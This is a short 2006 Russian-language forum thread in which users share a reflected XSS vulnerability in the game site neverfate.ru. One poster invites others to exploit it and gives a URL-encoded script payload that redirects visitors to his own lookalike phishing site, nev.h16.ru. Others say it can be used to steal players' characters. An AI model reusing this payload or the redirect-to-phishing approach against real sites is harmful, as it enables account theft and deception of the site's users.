PDA

Просмотр полной версии : Уязвимость в Neverfate.ru

Go0o$E
28.02.2006, 17:42
Вот тут xss на neverfate.ru нахел =)
Тут http://neverfate.ru/inf.php?name=[xss]
Развлекайтесь =)
Может кто еще что найдет?
Rebz
28.02.2006, 17:45
гм.. я конечно не силен в xss-ке.. но помоему там ничё нет.. а если есть то пассивная xss
Tem
28.02.2006, 17:51
Так мона и перса украсть.
Go0o$E
28.02.2006, 18:56
Да там пассивная xss. Вполне можно чара украсть =)
Вот пример - nev.h16.ru мой подставной сайт с url spoofing.
http://neverfate.ru/inf.php?name=%3C%73%63%72%69%70%74%3E%64%6F%63%75% 6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74 %74%70%3A%2F%2F%6E%65%76%2E%68%31%36%2E%72%75%22%3 C%2F%73%63%72%69%70%74%3E - ссылка для редиректа на сайт.
Go0o$E
01.03.2006, 16:05
Может видео про это снять, а?
Tem
01.03.2006, 16:16
Сними можна без проблем.